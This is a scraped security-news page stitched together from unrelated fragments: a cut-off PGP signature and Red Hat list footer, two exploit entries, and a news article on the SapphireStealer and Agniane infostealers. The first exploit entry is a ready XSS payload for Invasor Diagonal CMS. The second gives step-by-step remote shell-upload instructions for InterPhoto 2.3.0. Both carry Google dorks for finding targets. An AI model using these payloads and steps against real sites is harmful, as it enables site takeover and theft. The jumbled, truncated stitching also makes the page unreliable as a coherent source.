iQIcBAEBCAAGBQJk71aiAAoJENzjgjWX9erEEeMP/38UjIh+KtHdEGzY0pCSWgY/  
h/Raw/2p2mdL4hmDZY1S/NpQvqJQVZyp2iNm0TvEIMx21llo1UB+k9+MVwpuyG37  
6hT7pYn29ZBJoLLDfIxhbBUAYqSG/X3DHuBk5yZS/1Zk4oRATf+zTmB+eYpu9cyg  
FSrWqjInn0gUlSe6ULD+F5xofFoTl0jMT8of2hPvdYTLb7zUqX+iTil1Msk1SNDU  
ZpyAMxrssXOTmeYhO9RBaMcz+8SowovgFswz64bu+zcTeqFOXVZxV66e3ujt5KFF  
Nw7EI1sxqlliL5Ua8yJJ06d4iXlrNJ/HtCYKp90lvKtMUfiC2asEyOrD443z6y8p  
o3ztktSRxL4U2ZZ6NziiL5mLEIaOIAjOidDyLT9Vs/1YOgy6GWBA3bcFHOlbZYkE  
Squ4CLIK0MJZqyaymelDEkaPXnepqFT5UJjVRwca9vYwa4dOuzQ3+mI/71tj1s6F  
D0NRD1WQ+MmzJwTcXW4xbDEAxvw69AVY3wR5yaBMsAOSuGnFKXrs/UhKFXaTKEH7  
gSlPtnN6XjaAIqYSjQBn8OSNH/D0fIYyFDbdumlTAwvkhyuIOX1QEbSzZyZllFcZ  
bwk1mQtX2mWwP/otwBG9Pw5d8IBdI+S0kmBk8t+91dOwHPixBvphxm6GyVYussNq  
6y5hfCF2oCRBFoD8Yimi  
=SNTx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4877-01

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Invasor Diagonal CMS 1.0 Cross Site Scripting

InterPhoto version 2.3.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : InterPhoto 2.3.0 Persians Remote Shell Upload vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.dl.persianscript.ir/script/InterPhoto_2.3.0_Persians(PersianScript.ir).zip                              || # Dork      : InterPhoto 2.3.0                                    '                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register an Account : http://site/register.php  [+] Upload the shell.php instead of your photo (shell.php.jpg) : http://site/mydesk.upload.php[+] so rename shell.php.jpg to shell.php by Live HTTP Headers.(Mozilla FireFox Add-ons)  [+] Locate the shell in this route : http://site/MyWebsiteImages/XX/original/YY.php  [+] XX=Name of This Folder Like This Pattern : Year_Month_RandomChar(Sample : 2012_10_oZUGCD7IP81I)  [+] YY=Name of Shell.(Renamed to Random Char)Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

InterPhoto 2.3.0 Shell Upload

An open-source .NET-based information stealer malware dubbed SapphireStealer is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants.
“Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional

An open-source .NET-based information stealer malware dubbed **SapphireStealer** is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants.

"Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion," Cisco Talos researcher Edmund Brumaghin said in a report shared with The Hacker News.

An entire ecosystem has developed over time that allows both financially motivated and nation-state actors to use services from purveyors of stealer malware to carry out various kinds of attacks.

Viewed in that light, such malware not only represents an evolution of the cybercrime-as-a-service (CaaS) model, they also offer other threat actors to monetize the stolen data to distribute ransomware, conduct data theft, and other malicious cyber activities.

SapphireStealer is a lot like other stealer malware that have increasingly cropped up on the dark web, equipped with features to gather host information, browser data, files, screenshots, and exfiltrate the data in the form of a ZIP file via Simple Mail Transfer Protocol (SMTP).

But the fact that its source code was published for free in late December 2022 has enabled miscreants to experiment with the malware and make it difficult to detect. This includes the addition of flexible data exfiltration methods using a Discord webhook or Telegram API.

"Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time," Brumaghin said.

The malware author has also made public a .NET malware downloader, codenamed FUD-Loader, which makes it possible to retrieve additional binary payloads from attacker-controlled distribution servers.

Talos said it detected the malware downloader being used in the wild to deliver remote administration tools like DCRat, njRAT, DarkComet, and Agent Tesla.

The disclosure comes a little over a week after Zscaler shared details of another stealer malware called Agniane Stealer that's capable of plundering credentials, system information, session details from browsers, Telegram, Discord, and file transfer tools, as well as data from over 70 cryptocurrency extensions and 10 wallets.

It's offered for sale for $50 a month (no lifetime license) on several dark web forums and a Telegram channel.

"The threat actors responsible for Agniane Stealer utilize packers to maintain and regularly update the malware's functionality and evasions features," security researcher Mallikarjun Piddannavar said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web